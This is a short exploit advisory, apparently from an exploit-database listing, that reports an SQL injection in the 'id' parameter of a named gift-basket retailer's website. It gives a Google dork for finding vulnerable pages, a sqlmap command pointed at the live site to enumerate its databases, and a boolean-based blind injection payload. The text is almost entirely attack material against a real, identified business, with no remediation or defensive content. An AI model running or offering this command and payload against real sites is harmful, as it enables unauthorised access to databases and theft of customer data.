**************************** #Exploit Title: WHISTLERGIFTBASKET - SQL Injection vulnerability #Date: 2020-09-14 #Exploit Author: Mahdi Karimi #Vendor Homepage: http://www.whistlergiftbasket.com #Google Dork: baskets.php?id=2 #Tested On: windows 10 sqlmap: sqlmap -u "http://www.whistlergiftbasket.com/baskets.php?id=2" --dbs Testing Method; - boolean-based blind Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2' AND 8901=8901 AND 'CWwA'='CWwA ************************************************** #Discovered by: Mahdi Karimi #Email : mjoker22mjoker22@gmail.com **************************************************